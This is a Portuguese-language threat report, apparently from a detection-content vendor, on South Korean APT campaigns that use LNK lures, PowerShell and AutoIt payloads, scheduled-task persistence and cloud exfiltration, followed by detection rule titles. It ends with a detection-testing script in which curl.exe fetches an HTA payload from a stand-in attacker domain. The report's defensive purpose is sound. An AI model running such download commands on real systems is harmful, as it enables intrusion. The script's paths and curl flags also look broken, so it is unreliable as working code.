SOC Prime Bias: Critical

31 Aug 2026 06:13 UTC

Relatório Sobre Ameaças APT na Coreia do Sul: Tendências de Julho de 2026

Author Photo
SOC Prime Team linkedin icon Seguir
Relatório Sobre Ameaças APT na Coreia do Sul: Tendências de Julho de 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

A AhnLab relata um aumento na atividade APT visando organizações sul-coreanas através de campanhas de spear-phishing. Os ataques dependem principalmente de arquivos LNK maliciosos para entregar cargas incluindo scripts PowerShell, scripts AutoIt e backdoors. As técnicas comuns incluem persistência através do Agendador de Tarefas e exfiltração de dados por serviços como Dropbox e PubNub.

Investigação

A investigação se concentrou na infraestrutura APT usada contra entidades sul-coreanas durante julho de 2026. Analistas agruparam a atividade em vários tipos de ataques, de A a G, com base nos métodos de entrega e nas características funcionais. Pesquisadores também identificaram comportamentos incluindo DLL side-loading e abuso de utilitários nativos do Windows como curl.exe para recuperação de carga.

Mitigação

Os usuários devem verificar as identidades dos remetentes e evitar abrir anexos recebidos de fontes desconhecidas ou não confiáveis. As organizações devem manter os sistemas operacionais e navegadores da web atualizados com os patches de segurança mais recentes. Também é recomendado manter soluções de antivírus e proteção de endpoint atualizadas, como o V3.

Resposta

Se arquivos LNK suspeitos ou entradas de Agendador de Tarefas não autorizadas forem detectados, os respondentes de incidentes devem isolar imediatamente o host afetado. A forense de memória deve ser realizada para identificar backdoors injetados ou DLLs maliciosas. Os registros de rede também devem ser revisados em busca de conexões de saída incomuns para serviços de hospedagem de arquivos ou canais de comando e controle como o PubNub.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Comportamento Suspeito de Evasão de Defesa MSHTA LOLBAS por Detecção de Comandos Associados (via process_creation)

Equipe SOC Prime
28 ago 2026

Uso Suspeito de CURL (via cmdline)

Equipe SOC Prime
28 ago 2026

Tarefa Agendada Suspeita (via audit)

Equipe SOC Prime
28 ago 2026

Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)

Equipe SOC Prime
28 ago 2026

Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)

Equipe SOC Prime
28 ago 2026

IOCs (HashMd5) para detectar: Relatório de Tendências de Ameaças de julho de 2026 sobre Ataques APT (Coréia do Sul)

Regras de IA SOC Prime
28 ago 2026

Curl.Exe Usado para Baixar e Executar Arquivos Maliciosos [Windows Sysmon]

Regras de IA SOC Prime
28 ago 2026

Detectar Comandos Maliciosos do PowerShell dentro de Arquivos LNK [Windows PowerShell]

Regras de IA SOC Prime
28 ago 2026

Execução de Simulação

Pré-requisito: A verificação pré-voo de Telemetria & Baseline deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.

  • Narrativa & Comandos do Ataque: O adversário pretende usar curl.exe para baixar um arquivo HTA malicioso no %TEMP% diretório para estabelecer um ponto de apoio. Para testar se a lógica atual de detecção está funcionando (pois ele especificamente procura as palavras “download” ou “execute”), o atacante usará uma linha de comando que inclua explicitamente essas palavras como parte de um argumento falso ou descrição, simulando um script mal construído ou uma tentativa específica de imitar o padrão que o SOC está procurando.

  • Script de Teste de Regressão:

     # Simular um adversário usando curl com as palavras-chave específicas exigidas pela regra
      $tempPath = $env:TEMPmalicious.hta
      $url = "http://domínio-controlado-por-atacante.com/payload.hta"
    
      # Este comando é projetado especificamente para acionar a lógica 'contém' da regra
      # incluindo as palavras 'download' e 'execute' na string da linha de comando.
      Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'"
  • Comandos de Limpeza:

     # Remover o arquivo dummy criado durante a simulação
      if (Test-Path "$env:TEMPmalicious.hta") {
          Remove-Item -Path "$env:TEMPmalicious.hta" -Force
      }